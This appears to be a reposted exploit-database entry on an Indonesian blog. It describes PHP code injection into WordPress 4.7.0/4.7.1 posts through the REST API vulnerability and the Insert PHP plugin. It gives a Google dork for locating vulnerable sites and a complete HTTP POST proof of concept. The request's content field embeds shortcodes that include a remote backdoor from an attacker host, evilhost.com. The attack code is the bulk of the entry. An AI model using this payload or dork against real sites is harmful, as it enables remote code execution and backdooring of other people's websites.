WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection

Daftar Isi Artikel

# Exploit Title: WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection

# Exploit Author: sucuri.net @sucurisecurity

# Date: 2017-02-09

# Google Dork : inurl:/wp-content/plugins/insert-php/

# Vendor Homepage: https://fr.wordpress.org/plugins/insert-php/

# Tested on: MSWin32

# Version: <3.3.1

# Explanation : You Can Inject PHP Code INTO Pages via Wordpress REST API Vulnerability

# PoC :

POST http://localhost.com/wp-json/wp/v2/posts/1234 HTTP/1.1

Host: localhost.com

User-Agent: Xploit

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.8

Accept-Encoding: gzip,deflate,lzma,sdch

Connection: keep-alive

content-type: application/json

{ "id": "1234ffff", "title": "by Hacker", "content": "[insert_php] include('http[:]//evilhost.com/file/backdoor.php'); [/insert_php][php] include('http[:]//evilhost.com/file/backdoor.php'); [/php]" }

# Reference : https://blog.sucuri.net/2017/02/rce-attempts-against-the-latest-wordpress-rest-api-vulnerability.html

★★★★

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>